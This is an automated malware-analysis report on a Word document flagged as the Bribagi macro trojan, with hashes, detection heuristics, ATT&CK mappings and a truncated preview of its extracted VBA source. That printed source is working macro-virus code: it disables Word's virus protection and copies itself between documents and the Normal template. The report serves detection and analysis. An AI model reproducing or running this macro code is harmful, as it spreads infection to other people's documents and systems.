Bribagi Office (OLE) malware analysis — malicious · a402f246b7534b5d

MALICIOUS

Office (OLE)

43.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 40f080f6fb18080e71980016a2d6bb7d SHA-1: 6331e56b48138f5e41d9c7c8c94e0dc12b313e04 SHA-256: a402f246b7534b5d5e8b97ac9eef8128d9b9e8c4ec4ecef20390ac6c2f9816ee

180 Risk Score

Malware Insights

Bribagi · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Bribagi-1. Static analysis revealed the presence of legacy WordBasic and VBA macros, specifically an AutoOpen macro, which is a common technique for initial execution. The AutoOpen macro is designed to copy itself and potentially other malicious components, indicated by the references to WR0001.txt and WR0002.log, suggesting a downloader or dropper functionality.

Heuristics 5

ClamAV: Doc.Trojan.Bribagi-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Bribagi-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29099 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	29099 bytes
SHA-256: `db7677c991ca28c8fae0eefc840eb27df697d5ee44a22fe85a1759dd371bb752`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Personal" Dim WR0005 As String, WR0006 As String, a(1000) As String, Stcnt As Integer Sub BRiBAGI(MyPass As String) MyNam = Dir(MyPass, vbDirectory) Do While MyNam <> "" If MyNam <> "." And MyNam <> ".." And MyNam <> "pagefile.sys" Then If (GetAttr(MyPass & MyNam) And vbDirectory) = vbDirectory Then Open WR0005 For Append As #1 Write #1, MyPass & MyNam & "\" Close #1 Else Open WR0006 For Append As #1 Write #1, MyPass & MyNam Close #1 End If End If MyNam = Dir Loop End Sub Sub AutoOpen() ' ' BRiBAGI,1.01 ' Options.VirusProtection = False With ActiveDocument .UpdateStylesOnOpen = False .AttachedTemplate = "Normal" End With f$ = ActiveDocument.Path If Right$(f$, 1) = "\" Then f$ = Left$(f$, 2) f$ = f$ & "\" & ActiveDocument.Name N$ = ActiveDocument.AttachedTemplate.Path If Right$(N$, 1) = "\" Then N$ = Left$(N$, 2) N1$ = N$ & "\WR0001.txt" N2$ = Left$(N$, 2) & "\WR0002.log" N$ = N$ & "\" & ActiveDocument.AttachedTemplate.Name EFlag = 0 FFlag = 0: FFlag1 = 0 On Error GoTo errhandler Application.OrganizerCopy Source:=f$, Destination:=N$ _ , Name:="Personal", Object:=wdOrganizerObjectProjectItems Set MyTemplate = ActiveDocument.AttachedTemplate MyTemplate.Save MyDate = Date Open N2$ For Append As #1 FScale = LOF(1) Write #1, MyDate Close #1 If FScale > 80 Then Open N2$ For Input As #1 Input #1, ODate Close #1 Open N2$ For Append As #1 Write #1, ODate Write #1, MyDate Close #1 End If If GetAttr(f$) = vbReadOnly Then Options.VirusProtection = True Exit Sub End If FFlag = 1: FFlag1 = 1 resume1: DFlag = 0: EFlag = 1 Application.OrganizerCopy Source:=N$, Destination:=f$ _ , Name:="Personal", Object:=wdOrganizerObjectProjectItems ActiveDocument.Save DFlag = 1 errhandler: If FFlag1 = 0 And EFlag = 0 Then Resume resume1 End If If FFlag = 0 And DFlag = 0 Then FVsn = 1.01: DVsn = 0 Application.Run MacroName:="Normal.Personal.DWri" Open N1$ For Input As #1 Input #1, DVsn Close #1 If FVsn > DVsn Then Application.OrganizerDelete Source:=N$ _ , Name:="Personal", Object:=wdOrganizerObjectProjectItems Application.OrganizerCopy Source:=f$, Destination:=N$ _ , Name:="Personal", Object:=wdOrganizerObjectProjectItems Set MyTemplate = ActiveDocument.AttachedTemplate MyTemplate.Save MyDate = Date Open N2$ For Append As #1 FScale = LOF(1) Write #1, MyDate Close #1 If FScale > 300 Then Open N2$ For Input As #1 Input #1, ODate Close #1 Open N2$ For Append As #1 Write #1, ODate Write #1, MyDate Close #1 End If ElseIf FVsn < DVsn Then Application.Run MacroName:="Normal.Personal.DOpen" End If End If Options.VirusProtection = True End Sub Sub AutoClose() Options.VirusProtection = False With ActiveDocument .UpdateStylesOnOpen = False .AttachedTemplate = "Normal" End With f$ = ActiveDocument.Path If Right$(f$, 1) = "\" Then f$ = Left$(f$, 2) f$ = f$ & "\" & ActiveDocument. ... (truncated)

SHA-256: db7677c991ca28c8fae0eefc840eb27df697d5ee44a22fe85a1759dd371bb752

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Personal"
Dim WR0005 As String, WR0006 As String, a(1000) As String, Stcnt As Integer
Sub BRiBAGI(MyPass As String)

MyNam = Dir(MyPass, vbDirectory)
Do While MyNam <> ""
    If MyNam <> "." And MyNam <> ".." And MyNam <> "pagefile.sys" Then
        If (GetAttr(MyPass & MyNam) And vbDirectory) = vbDirectory Then
            Open WR0005 For Append As #1
                Write #1, MyPass & MyNam & "\"
            Close #1
        Else
            Open WR0006 For Append As #1
                Write #1, MyPass & MyNam
            Close #1
        End If
    End If
    MyNam = Dir
Loop

End Sub

Sub AutoOpen()
'
' BRiBAGI,1.01
'
    Options.VirusProtection = False
    With ActiveDocument
        .UpdateStylesOnOpen = False
        .AttachedTemplate = "Normal"
    End With

    f$ = ActiveDocument.Path
    If Right$(f$, 1) = "\" Then f$ = Left$(f$, 2)
    f$ = f$ & "\" & ActiveDocument.Name
    N$ = ActiveDocument.AttachedTemplate.Path
    If Right$(N$, 1) = "\" Then N$ = Left$(N$, 2)
    N1$ = N$ & "\WR0001.txt"
    N2$ = Left$(N$, 2) & "\WR0002.log"
    N$ = N$ & "\" & ActiveDocument.AttachedTemplate.Name
    EFlag = 0

    FFlag = 0: FFlag1 = 0
    On Error GoTo errhandler
        Application.OrganizerCopy Source:=f$, Destination:=N$ _
            , Name:="Personal", Object:=wdOrganizerObjectProjectItems
        Set MyTemplate = ActiveDocument.AttachedTemplate
        MyTemplate.Save
        MyDate = Date
        Open N2$ For Append As #1
            FScale = LOF(1)
            Write #1, MyDate
        Close #1
        If FScale > 80 Then
            Open N2$ For Input As #1
                Input #1, ODate
            Close #1
            Open N2$ For Append As #1
                Write #1, ODate
                Write #1, MyDate
            Close #1
        End If
        If GetAttr(f$) = vbReadOnly Then
            Options.VirusProtection = True
            Exit Sub
        End If
    FFlag = 1: FFlag1 = 1
resume1:
    DFlag = 0: EFlag = 1
        Application.OrganizerCopy Source:=N$, Destination:=f$ _
            , Name:="Personal", Object:=wdOrganizerObjectProjectItems
        ActiveDocument.Save
    DFlag = 1

errhandler:
    If FFlag1 = 0 And EFlag = 0 Then
        Resume resume1
    End If
    If FFlag = 0 And DFlag = 0 Then
        FVsn = 1.01: DVsn = 0
        Application.Run MacroName:="Normal.Personal.DWri"
        Open N1$ For Input As #1
            Input #1, DVsn
        Close #1
        If FVsn > DVsn Then
            Application.OrganizerDelete Source:=N$ _
                , Name:="Personal", Object:=wdOrganizerObjectProjectItems
            Application.OrganizerCopy Source:=f$, Destination:=N$ _
                , Name:="Personal", Object:=wdOrganizerObjectProjectItems
            Set MyTemplate = ActiveDocument.AttachedTemplate
            MyTemplate.Save
            MyDate = Date
            Open N2$ For Append As #1
                FScale = LOF(1)
                Write #1, MyDate
            Close #1
            If FScale > 300 Then
                Open N2$ For Input As #1
                    Input #1, ODate
                Close #1
                Open N2$ For Append As #1
                    Write #1, ODate
                    Write #1, MyDate
                Close #1
            End If
        ElseIf FVsn < DVsn Then
            Application.Run MacroName:="Normal.Personal.DOpen"
        End If
    End If
    Options.VirusProtection = True
End Sub
Sub AutoClose()
    
    Options.VirusProtection = False
    With ActiveDocument
        .UpdateStylesOnOpen = False
        .AttachedTemplate = "Normal"
    End With

    f$ = ActiveDocument.Path
    If Right$(f$, 1) = "\" Then f$ = Left$(f$, 2)
    f$ = f$ & "\" & ActiveDocument.
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.